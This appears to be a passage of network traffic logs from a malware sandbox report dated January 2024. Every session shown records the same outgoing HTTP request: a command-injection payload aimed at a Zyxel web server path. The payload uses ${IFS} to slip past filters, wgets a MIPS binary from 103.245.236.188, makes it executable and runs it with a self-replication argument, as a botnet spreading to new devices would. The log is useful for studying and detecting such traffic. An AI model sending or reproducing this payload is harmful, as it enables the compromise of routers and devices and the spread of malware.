                                                Jan 12, 2024 18:16:24.482177019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4820192.168.2.236071297.97.2.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.482217073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4821192.168.2.234228640.55.46.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.482264042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4822192.168.2.2351738205.119.155.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.482285976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4823192.168.2.23389082.222.126.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.482337952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4824192.168.2.2337264120.39.227.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.482376099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4825192.168.2.2336252167.57.22.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.482422113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4826192.168.2.2353478164.201.236.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.482454062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4827192.168.2.233390831.212.91.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.482501984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4828192.168.2.233742819.181.204.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.482536077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4829192.168.2.2345820134.86.188.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.482566118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4830192.168.2.235378623.77.6.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.482597113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4831192.168.2.234012864.250.209.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.482631922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4832192.168.2.234973612.112.21.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.482693911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4833192.168.2.234930673.46.50.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.482767105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4834192.168.2.2353188201.108.224.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.482789993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4835192.168.2.2336958181.153.187.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.482831001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4836192.168.2.2355934108.64.12.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.482872009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4837192.168.2.2339688159.115.161.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.482897997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4838192.168.2.2346586152.226.60.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.482947111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4839192.168.2.235636057.104.107.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.482991934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4840192.168.2.2359236223.223.238.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.483011961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4841192.168.2.233491068.193.73.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.483062029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4842192.168.2.2335480112.5.161.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.483103991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4843192.168.2.2335008135.142.122.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.483136892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4844192.168.2.235830461.255.250.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.483166933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4845192.168.2.2352910123.155.30.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.483226061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4846192.168.2.2357712129.227.46.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.483279943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4847192.168.2.2360814189.94.5.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.483303070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4848192.168.2.2349330172.163.8.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.483357906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4849192.168.2.2348574128.1.164.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.483411074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4850192.168.2.2352384167.33.210.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.483432055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4851192.168.2.2352948193.48.117.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.483483076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4852192.168.2.233350669.167.68.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.483516932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4853192.168.2.2358032137.160.210.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.486920118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4854192.168.2.2333162134.19.55.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.486951113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4855192.168.2.234194499.193.213.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.487003088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4856192.168.2.2347280212.174.73.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.487040997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4857192.168.2.2346796145.73.130.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.487087965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4858192.168.2.233453062.211.204.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.487129927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4859192.168.2.2352612174.220.54.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.487152100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4860192.168.2.2352828162.31.36.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.487194061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4861192.168.2.2353402218.124.0.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.487234116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4862192.168.2.2354976135.244.92.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.487266064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4863192.168.2.234347692.35.118.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.496668100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4864192.168.2.234405078.166.43.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.496710062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4865192.168.2.235585448.233.221.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.496742964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4866192.168.2.2343056135.44.219.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.496829033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4867192.168.2.2333582176.207.223.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.496840000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4868192.168.2.234930824.52.87.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.496840000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4869192.168.2.23523605.100.138.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.496871948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4870192.168.2.2355616135.147.202.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.496934891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4871192.168.2.235643034.63.213.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.496978998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4872192.168.2.2347200106.186.54.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.497008085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4873192.168.2.2345288167.49.144.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.497055054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4874192.168.2.2345908117.224.38.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.497092962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4875192.168.2.2360352180.18.17.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.497162104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4876192.168.2.235773064.28.242.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.497195959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4877192.168.2.23387128.185.207.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.497253895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4878192.168.2.2352248116.3.197.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.497289896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4879192.168.2.2353508196.14.94.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.497344971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4880192.168.2.2347966118.100.122.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.497376919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4881192.168.2.234313252.167.159.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.497421026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4882192.168.2.235885673.41.18.254443
                                                TimestampBytes transferredDirectionData
